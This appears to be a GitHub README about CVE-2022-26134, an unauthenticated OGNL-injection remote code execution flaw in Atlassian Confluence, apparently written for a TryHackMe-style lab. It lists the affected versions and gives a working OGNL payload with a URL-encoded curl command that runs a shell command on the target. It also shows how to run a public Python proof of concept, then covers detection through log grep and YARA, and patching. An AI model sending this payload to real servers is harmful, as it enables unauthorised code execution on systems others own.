Giters

Muhammad-Ali007 / Atlassian_CVE-2022-26134

Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)

On May the 30th, 2022, an organisation named Volexity identified an un-authenticated RCE vulnerability (scoring 9.8 on NIST) within Atlassian's Confluence Server and Data Center editions (https://www.atlassian.com/software/confluence).

Confluence is a collaborative documentation and project management framework for teams. Confluence helps track project status by offering a centralised workspace for members.

The following versions of Confluence are vulnerable to this CVE:

  • 1.3.0 -> 7.4.17
  • 7.13.0 -> 7.13.7
  • 7.14.0 -> 7.14.3
  • 7.15.0 -> 7.15.2
  • 7.16.0 -> 7.16.4
  • 7.17.0 -> 7.17.4
  • 7.18.0 -> 7.18.1

You can view the NIST entry for CVE-2022-26134 here (https://nvd.nist.gov/vuln/detail/CVE-2022-26134).

This CVE uses a vulnerability within the OGNL (Object-Graph Navigation Language) expression language for Java. OGNL is used for getting and setting properties of Java objects, amongst many other things.

For example, OGNL is used to bind front-end elements such as text boxes to back-end objects and can be used in Java-based web applications such as Confluence. We can see how OGNL is used in the screenshot below. Values are input to a web form, where these values will be stored into objects within the application.

Exploitation We can abuse the fact that OGNL can be modified; we can create a payload to test and check for exploits.

In order to exploit this vulnerability within OGNL, we need to make an HTTP GET request and place our payload within the URI. For example, we can instruct the Java runtime to execute a command such as creating a file on the server: "${@java.lang.Runtime@getRuntime().exec("touch /tmp/thm/")}/".

This will need to be URL encoded. You can use this website to help URL encode your payloads (note that your curl payload will need to end in a trailing / and not $2F). Command: user@host~ curl -v http://<target_ip>:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/thm%22%29%7D/ Now, verify that the above command executed successfully by executing "ls /tmp" command in the above command.

There are a few working PoC exploits out there, I will be demonstrating Samy Younsi (Mwqda)'s PoC written in Python and hosted on GitHub (https://github.com/h3v0x/CVE-2022-26134).

  • clone the repository
  • change to that directory
  • run "python3 exploit.py -u <target_url> -c "

Detection

Log Files Confluence is an Apache Tomcat server which has logging located in /opt/atlassian/confluence/logs. You can use commands like grep to search for HTTP GET requests of payloads that are using Java runtime to execute commands. For example:

grep -R "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22" in catalina.out

YARA If you have Yara installed on the server running Confluence, Volexity (the finders of the vulnerability) has created the Yara rule for you to use, which is provided in this repository as well as on the following link (https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar).

Patching Atlassian has released an advisory for their products affected by this CVE, which you can read here (https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html). To resolve the issue, you need to upgrade your Confluence version. The suggested list at the time of publication is:

  • 7.4.17
  • 7.13.7
  • 7.14.3
  • 7.15.2
  • 7.16.4
  • 7.17.4
  • 7.18.1

Remember, OGNL is an expression language for Java-based web applications, so this vulnerability will also apply to other web apps running the same classes that Confluence uses!

Additional Reading Material:

About

Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)

Languages

Language:YARA 100.0%